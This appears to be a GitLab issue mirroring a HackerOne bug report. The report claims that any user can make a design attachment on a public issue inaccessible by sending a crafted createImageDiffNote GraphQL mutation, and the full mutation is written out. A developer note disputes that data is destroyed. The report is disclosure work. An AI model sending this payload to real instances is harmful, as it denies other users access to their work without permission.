ESCALATED: Destroying designs in public issues without any permission

HackerOne report #735282 by rpadovani on 2019-11-11, assigned to @cmaxim:

Developer note from @.luke: No data is destroyed and the user is permitted to perform this action. See #36493 (comment 246244742).

Summary

Any user can remove any design from any public issue

Steps to reproduce

Alice attaches a design to a public issue over a public project

Bob doesn't have any membership to the project or to the parent's group.
Still, Bob can comment over the design.

Using GraphQL, Bob can comment with a syntactically valid comment, but with a broken content. The broken content will make the design completely inaccessible.

Given any public ID of a design attachment, attacker can submit this GraphQL query:

mutation {  
  createImageDiffNote(input:{  
    noteableId: "gid://gitlab/DesignManagement::Design/2329"  
    position: {  
      headSha: "0",  
      startSha: "0",  
      paths: {  
        oldPath: "x",  
        newPath: "x"  
      }  
      x: 0,  
      y: 0,  
      width: 0,  
      height: 0  
    },  
    body:"test"  
  }) {  
    errors   
    note {  
      id  
    }  
  }  
}

The mutation will be successful, and the resource will disappear

Impact

DoS over design feature

Output of checks

This bug happens on GitLab.com

Impact

Destroying resources over which attacker hasn't any permission